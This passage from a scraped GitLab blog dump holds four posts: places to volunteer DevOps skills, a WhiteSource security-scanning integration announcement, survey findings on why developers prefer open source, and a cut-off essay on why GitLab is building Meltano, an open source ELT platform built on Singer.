Here are some rewarding opportunities to donate your tech knowledge to others.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749683269/Blog/Hero%20Images/clark-tibbs-oqstl2l5oxi-unsplash.jpg","https://about.gitlab.com/blog/where-to-donate-your-devops-skills","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Where to donate your DevOps skills\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sandra Gittlen\"}],\n        \"datePublished\": \"2021-12-08\",\n      }",{"title":5391,"description":5392,"authors":5397,"heroImage":5393,"date":5398,"body":5399,"category":1078,"tags":5400},[862],"2021-12-08","\n\nYour technical knowledge could be a gift to someone else. Nonprofits around the world are seeking talented professionals to mentor, volunteer their technical skills, or teach courses in-person and online. The donations of your time and expertise could change the lives of people in your community or halfway around the world. The more access underrepresented groups, including women and minorities, have to skills development and mentoring that lead to higher-paying jobs, the better their chances of rising up out of difficult socio-economic conditions. And don’t forget, volunteering is incredibly rewarding.\n\nHere are six organizations and tech communities that could benefit from your skills and experience: \n\n## [Outreachy](https://www.outreachy.org/)\n\nOutreachy provides internships in open source to people subject to systemic bias and impacted by underrepresentation in the technical industry where they are living. Outreachy interns work with experienced mentors from open source communities. 
Internship projects may include programming, user experience, documentation, graphical design, data science, marketing, user advocacy, or community event planning.\n\nGitLab has participated in the Outreachy internship program, which intersects with our [Diversity, Inclusion, and Belonging](https://handbook.gitlab.com/handbook/values/#diversity-inclusion) value. Our team, including Senior Backend Engineer [Christian Couder](https://gitlab.com/chriscool), wrote [about their experience](https://about.gitlab.com/blog/outreachy-sponsorship-winter-2020/): “One of the benefits of the Outreachy technology internship is that the interns do not need to be students. It's a great opportunity for people who are coming back into the workforce after a hiatus, or who are navigating a career change into tech. This technology internship program is unique because it incorporates skill sets beyond engineering – which creates a broader range of skill sets represented in the open source world. The Outreachy internship is remote, making it more relevant than ever during the pandemic by helping interns gain experience working on an all-remote team.”\n\n## [CodeYourFuture](https://codeyourfuture.io/)\n\nCodeYourFuture is a U.K.-based nonprofit that trains “some of the most deprived members of society” to become web developers and helps them to find work in the tech industry. Students are trained in full-stack web development by volunteers from the tech industry, putting a strong emphasis on collaboration and product development through tech projects.\n\nSenior Frontend Engineer [Coung Ngo](https://gitlab.com/cngo) contributes his time to the nonprofit and says that while DevOps is not in the syllabus, the underlying skill sets are. “They teach a full-stack course of HTML, CSS, JS, React, Node, and SQL/MongoDB,” Ngo says. 
“It's a nice community, so if someone lives in London, Glasgow, Manchester, or Birmingham, it's enjoyable to join in with the in-person classes.”\n\n## [WeThinkCode](https://www.wethinkcode.co.za/about)\n\nWeThinkCode is a nonprofit aimed at closing the skills gap in the digital sector in South Africa and preparing young people to participate in the region’s economy. The organization believes that South Africa’s youth represent a pool of talent that mostly remains untapped and wants to provide businesses with access to this source of tech talent. Nonprofits like WeThinkCode are important because of the way they mobilize previously underestimated groups by providing an avenue for education where traditional paths are often more closed off. \n\nWeThinkCode was a GitLab donation recipient and the organization utilizes GitLab’s free SaaS version in their curriculum. The organization has [four ways for professionals to volunteer](https://www.wethinkcode.co.za/volunteer), including virtual opportunities:\n\n- Mentorship - Experienced software development practitioners provide guidance to a group of four to six students on communication, ways of working, insights on tackling programming challenges in the curriculum, and tips on the conduct expected in the workplace. 
\n \n- Interview readiness - Practitioners with experience in hiring and recruiting will help conduct mock interviews and then provide constructive feedback.\n\n- WomenThinkCode Meetups - Women in tech to act as role models and deliver talks about their career journeys covering tech and interpersonal aspects.\n\n- Community-hosted talks - Practitioners deliver talks on the real-world application of various technologies.\n\n## [KodewithKlossy](https://www.kodewithklossy.com/)\n\nKodewithKlossy is a nonprofit with the mission to create learning experiences and opportunities for young women and nonbinary individuals that increase their confidence and inspire them to pursue their passions in a technology-driven world. KodewithKlossy found that prior to camp, only two out of 10 attendees (also called scholars) had computer science experience and after, as a result of their camp experience, nine in 10 say they plan to pursue education and opportunities in computer science. Volunteers can serve as role models in the camp speaker series or participate in other important ways.\n\n## [Google Summer of Code](https://summerofcode.withgoogle.com/archive/)\n\nGoogle Summer of Code (GSoC) is a global program focused on bringing more student developers into open source software development. Students work on a three-month programming project with an open source organization during their break from university. \n\nIn 2022, Google will [expand its GSOC enrollment](https://opensource.googleblog.com/2021/11/expanding-google-summer-of-code-in-2022.html) beyond students to include all newcomers to open source who are 18 years and older. Google states, “We realize there are many folks that could benefit from the GSoC program that are at various stages of their career, recent career changers, self-taught, those returning to the workforce, etc. 
so we wanted to allow these folks the opportunity to participate in GSoC.”\n\nGitLab [participated this year](https://summerofcode.withgoogle.com/archive/2021/organizations/5396515480141824/), helping to mentor students, and Couder has been a mentor since 2008.\n\n## Open source communities\n\nOpen source communities like Cloud Native Computing Foundation [(CNCF)](https://www.cncf.io/), which include students and people who are changing careers, are a fantastic outlet to share your DevOps expertise. You can help other community members improve their features or applications, learn about documentation, learn new languages, and uncover bugs. Senior Developer Evangelist [Michael Friedrich](https://gitlab.com/dnsmichi) says it is rewarding to become a mentor in open source communities. “It is important to be honest, but also to be patient and kind. Don’t say something is easy – it’s not easy for that person. Instead, make sure to share your expertise in a constructive and helpful way,” he adds. 
Listen to more of Friedrich’s [advice for open source contributions](https://www.youtube.com/watch?v=yT63olXdS-I).\n\n_Cover image by Clark Tibbs via [Unsplash](https://unsplash.com/)._\n",[685,9,267],{"slug":5402,"featured":6,"template":689},"where-to-donate-your-devops-skills","content:en-us:blog:where-to-donate-your-devops-skills.yml","Where To Donate Your Devops Skills","en-us/blog/where-to-donate-your-devops-skills.yml","en-us/blog/where-to-donate-your-devops-skills",{"_path":5408,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5409,"content":5415,"config":5420,"_id":5422,"_type":14,"title":5423,"_source":16,"_file":5424,"_stem":5425,"_extension":19},"/en-us/blog/whitesource-gitlab-security-integration",{"title":5410,"description":5411,"ogTitle":5410,"ogDescription":5411,"noIndex":6,"ogImage":5412,"ogUrl":5413,"ogSiteName":673,"ogType":674,"canonicalUrls":5413,"schema":5414},"GitLab and WhiteSource: the easy way to secure your open source code","How we integrated with GitLab's security dashboards to make it easier to secure your open source code earlier in the dev lifecycle","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681016/Blog/Hero%20Images/gitlab-whitesource.png","https://about.gitlab.com/blog/whitesource-gitlab-security-integration","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab and WhiteSource: the easy way to secure your open source code\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Guy Bar-Gil, Product Manager at WhiteSource\"}],\n        \"datePublished\": \"2020-01-14\",\n      }",{"title":5410,"description":5411,"authors":5416,"heroImage":5412,"date":1178,"body":5418,"category":10,"tags":5419},[5417],"Guy Bar-Gil, Product Manager at WhiteSource","\n\nDevelopment teams have gotten used to relying on open source components to build powerful innovative software at a neck-breaking pace. 
The speed is certainly accelerating, but what about the security of our applications? Unfortunately, this is often treated as an afterthought, which is not surprising since security has traditionally been seen as a tiresome and time-consuming task that comes after the development stage and slows down production.\n\nIn an attempt to keep security up to speed with the pace of development, organizations are realizing that it can no longer be introduced in the later stages of the software development lifecycle (SDLC). Instead, fusing security into the earlier stages of the SDLC can enable development teams to detect and remediate vulnerabilities when they are significantly easier, quicker and cheaper to fix.\n\nBut how can we integrate security into our development process without adding more work and slowing down our pace?\n\nWell that's where GitLab and WhiteSource come in.\n\n## Secure open source code while in your GitLab UI\n\nWhiteSource has leveraged GitLab's Open Core to empower developers with the tools needed to find and fix open source vulnerabilities. The integration provides developer-focused security tools that operate within the native coding environment and within the [GitLab CI/CD pipeline](/topics/ci-cd/), allowing them to continuously address security without having to compromise on agility.\n\nWith the newest integration to GitLab Ultimate, developers gain richer insight into vulnerable open source components discovered by WhiteSource right in the merge request pipeline. At the same time security pros can see this in the GitLab Security Dashboard alongside scan results from SAST, DAST, containers, and license compliance. WhiteSource supports many more languages and provides richer dependency insight than GitLab alone. 
With GitLab, both security users and developers can see new, unresolved vulnerabilities for every code commit, with actionable insights on vulnerable open source libraries as well as all of their dependencies as soon as they are added to their projects.\n\n## Ensuring a secure future, together\n\nWith our partnership, we want to ensure that developers are able to harness the power of open source to create innovative products without having to compromise on security, speed, or agility.\n\n## So, what's next?\n\nVery soon, we'll be sharing a blog post with a step-by-step guide on how to integrate WhiteSource into your native GitLab environment. The best tips and tricks will be included to ensure you'll be able to secure your open source components freely and fearlessly.\n",[231,9,865],{"slug":5421,"featured":6,"template":689},"whitesource-gitlab-security-integration","content:en-us:blog:whitesource-gitlab-security-integration.yml","Whitesource Gitlab Security Integration","en-us/blog/whitesource-gitlab-security-integration.yml","en-us/blog/whitesource-gitlab-security-integration",{"_path":5427,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5428,"content":5433,"config":5438,"_id":5440,"_type":14,"title":5441,"_source":16,"_file":5442,"_stem":5443,"_extension":19},"/en-us/blog/why-choose-open-source",{"title":5429,"description":5430,"ogTitle":5429,"ogDescription":5430,"noIndex":6,"ogImage":1892,"ogUrl":5431,"ogSiteName":673,"ogType":674,"canonicalUrls":5431,"schema":5432},"Why more companies are adopting open source technology","The results are in – our 2016 Global Developer Survey revealed that open source tools are most preferred by developers the world over. 
Why?","https://about.gitlab.com/blog/why-choose-open-source","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Why more companies are adopting open source technology\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Rebecca Dodd\"}],\n        \"datePublished\": \"2017-03-03\",\n      }",{"title":5429,"description":5430,"authors":5434,"heroImage":1892,"date":5435,"body":5436,"category":10,"tags":5437},[1859],"2017-03-03","\n98 percent of developers use open source tools – even when they’re not supposed to! Here’s why.\n\n\u003C!-- more -->\n\nOur [Global Developer Report](https://page.gitlab.com/2016-developer-survey_2016-developer-survey.html) explores how developers’ methods are changing, and how businesses can adapt to get the best out of their development teams. More than half of our respondents identified as developer or engineer, giving us insight into what matters to developers, how they work and what tools they choose. To see what our research revealed, you can [download the full report](https://page.gitlab.com/2016-developer-survey_2016-developer-survey.html) to learn more about what today’s developers want.\n\n## Why open source is preferred\n\nNearly three-quarters of our survey respondents said that they chose to work with GitLab because it’s open source. So why is [open source](/solutions/open-source/) so popular?\n\n### Software evolves faster\n\nWith roots in the open source community, software is able to evolve quickly, with bugs detected and fixed rapidly by members of that community. 
This reduces the time spent waiting for fixes to be rolled out – a good case for why the majority of our survey respondents say that more than half of the tools they use are open source.\n\n![How much open source is used](https://about.gitlab.com/images/blogimages/open-source-tools-graph.png){: .shadow}\u003Cbr>\n\n### You know what you’re getting\n\nOpen source software is also considered more trustworthy: with source code open and available to inspect, developers can see for themselves exactly what it does. They can verify whether or not it's secure and introduce fixes and improvements if necessary.\n\n### You can adapt it yourself\n\nIf developers want to adapt a feature or add something that will make their jobs easier, they have the freedom to do so without relying on the software vendor to make the change. Open source also makes it easier to integrate different software products to suit the needs of the business.\n\n## Developers overwhelmingly choose open source\n\nSenior leadership only selects tools for their teams less than 20 percent of the time, and 11 percent of developers still choose to use their own open source tools, despite what their managers say. 
This poses a risk to companies insisting on closed source solutions for their developer teams: it compromises your ‘single source of truth’, risks team happiness and cohesion, and wastes resources spent on unused tools.\n\n![Who chooses development tools](https://about.gitlab.com/images/blogimages/who-in-org-decides-tools-graph.png){: .shadow}\u003Cbr>\n\nThe message is clear: when developers have the freedom to choose their tools (and sometimes even when they don’t!), they choose open source – maybe it’s time your company did too.\n\nImage: “[brooklyn sign](https://www.flickr.com/photos/petemccarthy/6866996865)” by [Peter McCarthy](https://www.flickr.com/photos/petemccarthy/) is licensed under [CC BY-ND 2.0](https://creativecommons.org/licenses/by-nd/2.0/)\n{: .note}\n",[9],{"slug":5439,"featured":6,"template":689},"why-choose-open-source","content:en-us:blog:why-choose-open-source.yml","Why Choose Open Source","en-us/blog/why-choose-open-source.yml","en-us/blog/why-choose-open-source",{"_path":5445,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5446,"content":5451,"config":5457,"_id":5459,"_type":14,"title":5460,"_source":16,"_file":5461,"_stem":5462,"_extension":19},"/en-us/blog/why-gitlab-is-building-meltano-an-open-source-platform-for-elt-pipelines",{"title":5447,"description":5448,"ogTitle":5447,"ogDescription":5448,"noIndex":6,"ogImage":1007,"ogUrl":5449,"ogSiteName":673,"ogType":674,"canonicalUrls":5449,"schema":5450},"Why GitLab is building Meltano, an open source platform for ELT pipelines","Our goal is to make the power of data integration available to all by building a true open source alternative to existing proprietary hosted ELT solutions.","https://about.gitlab.com/blog/why-gitlab-is-building-meltano-an-open-source-platform-for-elt-pipelines","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Why GitLab is building Meltano, an open source platform for ELT 
pipelines\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Douwe Maan\"}],\n        \"datePublished\": \"2020-05-18\",\n      }",{"title":5447,"description":5448,"authors":5452,"heroImage":1007,"date":5454,"body":5455,"category":951,"tags":5456},[5453],"Douwe Maan","2020-05-18","\n\n{::options parse_block_html=\"true\" /}\n\n\n\nThis post was originally [published on the Meltano blog](https://meltano.com/blog/why-we-are-building-an-open-source-platform-for-elt-pipelines/) on May 13, 2020.\n{: .alert .alert-info}\n\nThis post is part 2 of a 2-part series to announce and provide context on the new direction of [Meltano](https://meltano.com).\nIf you've been following Meltano for a while or would like to have some historical context, start with part 1: [Revisiting the Meltano strategy: a return to our roots](https://meltano.com/blog/revisiting-the-meltano-strategy-a-return-to-our-roots/).\nIf you're new to Meltano or are mostly interested in what's coming, feel free to skip part 1 and start here.\nIf you're worried that reading this entire post will take a lot of time, feel free to jump right to the conclusion: [Where Meltano fits in](#where-meltano-fits-in).\n{: .note}\n\n## Introduction\n\nIf you've read [part 1 of the series](https://meltano.com/blog/revisiting-the-meltano-strategy-a-return-to-our-roots/), you know that [Meltano](https://meltano.com) is now focused on building an **open source platform for data integration and transformation (ELT) pipelines**, and that we're very excited about it.\n\nBut why are we even building this?\n\nIsn't data integration (getting data from sources, like SaaS tools, to destinations, like data warehouses) a solved problem by now, with modern off-the-shelf tools having taken the industry by storm over the past few years, making it so that many (smaller) companies and data teams don't even need data engineers on staff anymore?\n\nOff-the-shelf ELT tools are not _that_ expensive, especially compared to other tools in the 
data stack, like Looker, and not having to worry about keeping your pipelines up and running or writing and maintaining data source connectors (extractors) is obviously extremely valuable to a business.\n\nOn top of that, writing and maintaining extractors can be tedious, thankless work, so why would anyone want to do this themselves instead of just paying a vendor to handle this burden instead?\n\nWho would ever want to use a self-managed ELT platform? And why would anyone think building this is a good use of time or money, _especially_ if it's going to be free and open source?\n\n---\n\nIn [part 1](https://meltano.com/blog/revisiting-the-meltano-strategy-a-return-to-our-roots/), I explained why we have concluded that in order to eventually realize our end-to-end vision for Meltano (a single tool for the entire data lifecycle, from data source to dashboard), we have to go all-in on positioning Meltano as an open source self-managed platform for running data integration and transformation (ELT) pipelines, and will turn Meltano into a true open source alternative to existing proprietary hosted solutions like [Alooma](https://www.alooma.com/), [Blendo](https://www.blendo.co/), [Hevo](https://hevodata.com/), [Matillion](https://www.matillion.com/products/etl-software/), [Pentaho](https://www.hitachivantara.com/en-us/products/data-management-analytics/pentaho-platform.html), and [Xplenty](https://www.xplenty.com/), in terms of ease of use, reliability, and quantity and quality of supported data sources.\n\nHowever, the points and questions raised above are totally valid, and were in fact raised by actual data engineers I've talked to over the past few weeks. 
While Meltano (and [GitLab](https://about.gitlab.com), which sponsors its development) have a need for the existence of such a tool, it's a separate matter entirely whether there are any data engineers or data teams out there who share that need.\n\nWould any data team actually consider joining the community, contributing to Meltano and its extractors and loaders, and eventually migrating to the open source tool, away from whatever proprietary solution they use today?\n\n## The problem: pay to play\n\nThe idea is that every data team in the world needs a data integration tool, because one way or another you have to get your data from your various sources into your data warehouse so that it can be analyzed. And since every company would be better off if they were analyzing their data and learning from their ups and downs, every company in the world needs a data integration tool whether they already realize it or not.\n\nSince there is currently no true open source alternative to the popular proprietary tools, the data space has effectively become \"pay to play\". There are many great open source analytics and business intelligence tools out there ([Superset](https://superset.incubator.apache.org/), [Metabase](https://www.metabase.com/), and [Redash](https://redash.io/) come to mind, and let's not forget that Meltano comes with built-in analytics functionality as well), but all assume that your data will somehow have already found its way into a data warehouse.\n\nIf for any reason at all you cannot use one of the hosted platforms, you are essentially out of luck and will not get to compete on a level playing field with those companies that can afford to integrate their data and start learning from it. 
Even if you have everything else going for you, you are massively disadvantaged from day one.\n\nPerhaps, you do not think of these off-the-shelf tools as particularly expensive, you're fine with your sensitive data flowing through a US company's servers, and you would happily pay for professional services if you ever need to extract data from a source that isn't supported already. \n\nHowever, many around the world will find prices US companies charge prohibitively expensive relative to their local income, may prefer (or be legally required) to have their data not leave their country or their servers, or may find that the locally grown SaaS services they use are often not supported by the existing US-centric vendors.\n\nAnd to be clear, US companies are not immune to these issues, even if they may be somewhat less affected by the financial argument. Think of HIPAA compliance, for example, which many (most? all?) hosted tools don't offer unless you sign up for one of their more expensive plans.\n\n**If you do not feel the pain of the current situation or see the need for change, recognize that your experience may not be representative.**\n\n### Data integration as a commodity\n\nThis perspective leads me to an argument with an ideological angle, that is particularly compelling to me because of the many parallels I see with the early days of [GitLab](https://about.gitlab.com/): the open source project that was [founded in Ukraine back in 2011](https://about.gitlab.com/company/history/) with the goal of building a self-managed alternative to the likes of [GitHub](https://github.com/) and [Bitbucket](https://bitbucket.org/), that a few years later became an open core product maintained primarily by the newly founded company that shares its name. 
To this day, GitLab comes in open source and proprietary flavors, and the functionality included in the Community Edition continues to be sufficient for hundreds of thousands of organizations around the world, that would otherwise have needed to opt for a paid, proprietary alternative. As GitLab is sponsoring the development of Meltano, these parallels are not a coincidence.\n\nSince an ELT platform is a tool every data engineer and every company needs if they want to have the best chance of survival and success, I would argue that it should be a commodity and should be available at a reasonable cost to everyone who wants or needs it. Anything less than that hurts a significant number of companies in their ability to reach their true potential and serve their users and customers as well as they would want to, thereby stifling innovation and competition, and we all end up paying the price because we have to deal with companies and products that are less optimized and improved than they could be.\n\nThe obvious question: if this is apparently such a problem, why haven't tons of competitors popped up already to serve these local markets or inject some competition into the US market? Orchestrating reliable data pipelines _is_ a solved problem, even in the open source space, where great tools like [Airflow](https://airflow.apache.org/) and [Luigi](https://github.com/spotify/luigi) exist and are running in production at thousands of organizations. 
That's not to say they're as easy to configure and get started with as the hosted platforms we're talking about, but the technology is there, assuming you have an extractor and loader to plug in.\n\nAnd I think that assumption is at the core of the issue, and at the core of the economic moat that the existing vendors have created around themselves, that makes it hard for new parties to enter the market and compete: the impressive amount of data sources they support out of the box, and their massive (in-house or outsourced) teams that have spent and continue to spend thousands of hours developing and maintaining these extractors and loaders.\n\nIf you've read [part 1](https://meltano.com/blog/revisiting-the-meltano-strategy-a-return-to-our-roots/) of this 2-part series, you'll remember that we ran into this ourselves when we offered a hosted version of Meltano's data connection and analytics interface to non-technical end-users. They could go straight from connecting their data source to viewing a dashboard, but only if we had written the extractor, loader, transformations, and models for that data source beforehand, and if we would continue to maintain these forever. We realized that this wasn't going to scale, and so would most companies that would decide to just write and maintain their own extractors instead of paying someone else to do it: it's a lot of work, and **it never ends**.\n\n## The solution: open source\n\nUltimately, though, the size of the economic moat that exists around these vendors can be measured in terms of developer hours, and there's no secret sauce or intellectual property that separates the current major players from anyone else out there who has their own hours to bring to the table.\n\nBy yourself, as a single company or data engineer, implementing and maintaining extractors for all of the data sources you need to integrate is not feasible, which is why most don't.\n\nTogether, though, that changes. 
With a big enough group of people capable of programming and motivated to collaborate on the development and maintenance of extractors and loaders, it's just a matter of time (and continued investment of time by a subset of the community) before every proprietary extractor or loader has an open source equivalent. The maintenance burden of keeping up with API and schema changes is not insignificant, but if open source communities can manage to maintain language-specific API client libraries for most SaaS APIs out there, there's no reason to think we'd have a harder time maintaining these extractors.\n\nAssuming there is no secret sauce or key intellectual property involved, **a sufficiently large and motivated group of people capable of programming can effectively will any new tool into existence**: that is the power of open source.\n\nThe more common the data source, the more people will want it, the faster it'll be implemented, the more heavily it'll be tested, and the more actively it'll be maintained. It doesn't need to take long before the segment of the market that only uses these common data sources will be able to swap out their current data integration solution for this open source alternative. It's not an all-or-nothing matter either: data teams can move their data pipelines over on a pipeline-by-pipeline basis, as extractors become available and reach the required level of quality.\n\nOf course, a self-managed platform for running data integration pipelines wouldn't just need to support a ton of extractors and loaders. You would also want to be confident that you can run it in production and get the same reliability and monitoring capabilities you get with the hosted vendors. 
Fortunately, this is where we can leverage an existing open source tool like Airflow or Luigi, that this hypothetical self-managed platform could be built around.\n\n### Everyone wins\n\nEven if you're not personally interested in ever using a self-managed data integration platform, you may benefit from us building one anyway.\n\nOpen source is the most promising strategy available today to increase competition in the data integration and data pipeline space. Even if the specific tool we're building doesn't actually become the Next Big Thing, the market will benefit from that increased competition.\n\nDevelopers of new SaaS tools and data warehouse technology would also benefit from an open source standard for extractors and loaders. Rather than wait (or pay) for data integration vendors to eventually implement support for their tool once it reaches a high enough profile or once its users start begging (or paying) the vendor loudly enough, new tools could hit the ground running by writing their own integrations. Today, many companies wouldn't consider switching to a new SaaS tool that isn't supported by their data integration vendor at all, putting these tools at a significant competitive disadvantage against their more mature and well-connected competitors.\n\nThe only ones who have something to lose here are the current reigning champions. For everyone else it's a win-win, whether you actually contribute to or use Meltano, or not. 
If you don't believe me, just look at the [DevOps](/topics/devops/) space and the impact that GitLab has had on the industry and the strategy and offering of the previously dominant players, GitHub and Bitbucket.\n\nIf an industry has effectively become \"pay to play\" because every software engineer in that industry needs to use one of a handful of paid tools in order to get anything done at all, there is a massive opportunity for an open source alternative \"for the people, by the people\" to level the playing field, and disrupt the established players from the bottom on up.\n\nOf course, GitLab is not just interested in sponsoring the development of such an open source project out of the goodness of its heart. The hope is that eventually, a business opportunity will arise out of this project and its community and ecosystem, because even if a truly competitive free and open source self-managed option is available, there will always be companies that would still prefer a hosted version with great support and enterprise features, who won't mind paying for it.\n\nBut for everyone else, **there will always be a Community Edition, and data integration will forever be a commodity rather than pay to play**.\n\n## The Singer specification\n\nOf course, we are not the first to be intrigued by the concept of open source data integration. Most significantly, [Stitch](https://www.stitchdata.com/) has developed the [Singer specification](https://www.singer.io/), which they describe as follows:\n\n> Singer describes how data extraction scripts—called “taps” —and data loading scripts—called “targets”— should communicate, allowing them to be used in any combination to move data from any source to any destination. 
Send data between databases, web APIs, files, queues, and just about anything else you can think of.\n\nThere's a [Getting Started guide](https://github.com/singer-io/getting-started/) on how to develop and run taps and targets (extractors and loaders), many dozens of them have already been written for a wide range of data sources, warehouses and file formats, a good amount of them are actively maintained and being used in production by various organizations, and the [Singer community on Slack](https://singer-slackin.herokuapp.com/) has over 2,100 members, with new people joining every day.\n\nOnce you've written (or installed) a tap and target, you can pipe them together on the command line (`tap | target`) and see your data flow from source to destination, which you can imagine is quite satisfying.\n\nOnce you've hit that milestone, though, the next step is not quite so obvious. How do I actually build a data pipeline out of this that I can run in production? Is there a recommended deployment or orchestration story? How do I manage my pipeline configuration and state? How do I keep track of the metrics some taps output, and how do I monitor the whole setup so that it doesn't fall flat on its face while I'm not looking?\n\nUnfortunately, the Singer specification and website don't touch on this. 
A number of tools have come out of the Singer community that make it easier to run taps and targets together ([PipelineWise](https://transferwise.github.io/pipelinewise/), [singer-runner](https://github.com/datamill-co/singer-runner), [tapdance](https://github.com/aaronsteers/tapdance), and [knots](https://github.com/singer-io/knots), to list a few), and some of these are successfully being used in production, but getting to that point still requires one to figure out and implement a deployment and orchestration strategy, and those who have managed to do so effectively have all needed to reinvent the wheel.\n\nThis means that while open source extractors and loaders do exist, as does a community dedicated to building and maintaining them, what's missing is the open source tooling and documentation around actually deploying and using them in production.\n\n### The missing ingredients\n\nIf this tooling did exist and if Singer-based data integration pipelines were truly easy to deploy onto any server or cloud, the Singer ecosystem immediately becomes a lot more interesting. Anyone would be able to spin up their own [Alooma](https://www.alooma.com/)/[Blendo](https://www.blendo.co/)/[Hevo](https://hevodata.com/)/[Matillion](https://www.matillion.com/products/etl-software/)/[Pentaho](https://www.hitachivantara.com/en-us/products/data-management-analytics/pentaho-platform.html)/[Xplenty](https://www.xplenty.com/)-alternative, self-managed and ready to go with a wide range of supported data sources and warehouses. Existing taps and targets would get more usage, more feedback, and more contributions, even if many prospective users may still end up opting for one of the proprietary alternatives in the end.\n\nMany people who come across the Singer ecosystem today end up giving up because they can't see a clear path towards actually using these tools in production, even if taps and targets already exist for all of the sources and destinations they're interested in. 
You have to be particularly determined to see it through and not just opt for one of the hosted alternatives, so the majority of people developing taps and targets and running them in production today are those for whom _not_ self-hosting was never really an option. Any amount of better tooling and documentation will cause people to take the Singer ecosystem more seriously as an open source data integration solution, and convince a couple more people to give it a try, who would have long given up today.\n\nDeveloping taps and targets is also not as easy as it could be. The Getting Started guide and [singer-tools](https://github.com/singer-io/singer-tools) toolset are a great start, and implementing a basic tap is pretty straightforward, but building one you would actually be comfortable running in production is still a daunting task. The existing taps can serve as examples, but they are not implemented consistently and don't all implement the full range of Singer features. The [singer-python](https://github.com/singer-io/singer-python) library contains utility functions for some of the most common tasks, but taps end up reimplementing a lot of the same boilerplate behavior anyway. Moreover, a testing framework or recommended strategy does not exist, meaning that users may not find out that a small inconspicuous change broke their extractor or loader until they see their entire data pipeline fail.\n\nAll in all, the Singer ecosystem has a ton of potential but suffers from a high barrier to entry, that negatively affects the experience of those who want to use existing taps and targets, as well as those potentially interested in developing new ones.\n\nOver the past few weeks, I've spent many hours talking to various members of the Singer community who _have_ been able to get their Singer-based pipelines running in production, and the observations above are informed by their perspectives and experience. 
Unanimously, they agreed that the Singer ecosystem is not currently living up to its potential, that change is needed, and that better tooling and documentation around deployment and development would go a long way.\n\n## Where Meltano fits in\n\nAs I'm sure you've pieced together by now, [Meltano](https://meltano.com/) intends to be that tooling and bring that change.\n\nOur goal is to **make the power of data integration available to all** by turning Meltano into a **true open source alternative to existing proprietary hosted ELT solutions**, in terms of ease of use, reliability, and quantity and quality of supported data sources.\n\nLuckily, we're not starting from zero: Meltano already speaks the Singer language and [uses taps and targets for its extractors and loaders](https://meltano.com/#integration). Its support goes beyond simply piping two commands together, as it also manages [configuration](https://meltano.com/docs/command-line-interface.html#config), [entity selection](https://meltano.com/docs/command-line-interface.html#select) and [extractor state](https://github.com/singer-io/getting-started/blob/master/docs/CONFIG_AND_STATE.md#state-file) for you. 
It also makes it super easy to [set up pipeline schedules](https://meltano.com/#orchestration) that can be run on top of a supported orchestrator like [Airflow](https://airflow.apache.org/).\n\nAdditionally, Meltano supports [dbt](https://www.getdbt.com/)-based [transformation as part of every ELT pipeline](https://meltano.com/#transformation), and comes with a basic web interface for [data source connection and pipeline management](https://meltano.com/docs/analysis.html#connect-data-sources) and [point-and-click analytics and report and dashboard creation](https://meltano.com/docs/analysis.html#explore-your-data), enabling you to go from data to dashboard using a single tool, that you can [run locally or host on any cloud](https://meltano.com/docs/installation.html).\n\nFor the foreseeable future, though, our focus will primarily be on [data integration](https://meltano.com/#integration), not transformation or analysis.\n\nWhile we've come a long way already, there's still plenty of work to be done on the fronts of ease of use, reliability, and quantity and quality of supported data sources, and we can't afford to get distracted.\n\n### Let's get to work!\n\nIf any of the above has resonated with you, or perhaps even inspired you, we'd love your help in realizing this vision for Meltano, the Singer ecosystem, and the data integration space in general. We literally won't be able to do it without you.\n\nBefore anything else, you'll want to see what Meltano can already do today by following the [examples on the homepage](https://meltano.com/). 
They can be copy-pasted right onto your command line, and in a matter of minutes will take you all the way through [installation](https://meltano.com/#installation), [integration](https://meltano.com/#integration), [transformation](https://meltano.com/#transformation), and [orchestration](https://meltano.com/#orchestration) with the [`tap-gitlab` extractor](https://meltano.com/plugins/extractors/gitlab.html) and [`target-jsonl`](https://meltano.com/plugins/loaders/jsonl.html) and [`target-postgres`](https://meltano.com/plugins/loaders/postgres.html) loaders.\n\nOnce you've got that working, you'll probably want to try Meltano with a different, more realistic data source and destination combination, which will require you to add a new [extractor](https://meltano.com/plugins/extractors/) ([Singer tap](https://www.singer.io/#taps)) and/or [loader](https://meltano.com/plugins/loaders/) ([Singer target](https://www.singer.io/#targets)) to your Meltano project. To learn how to do this, the homepage once again [has got you covered](https://meltano.com/#meltano-add).\n\nAnd that's about as far as you'll be able to get right now, with Meltano's existing tooling and documentation. Running a Meltano pipeline locally (with or without Airflow) is one thing, but actually deploying one to production is another. As we've identified, this is one of the places where the Singer ecosystem and documentation currently fall short, and for the moment, [Meltano is no different](https://gitlab.com/groups/meltano/-/epics/79).\n\nFor this reason, the first people we would love to get involved with the Meltano project are **those who are already part of the Singer community**, and in particular **those who have already managed to get Singer-based ELT pipelines running in production**. 
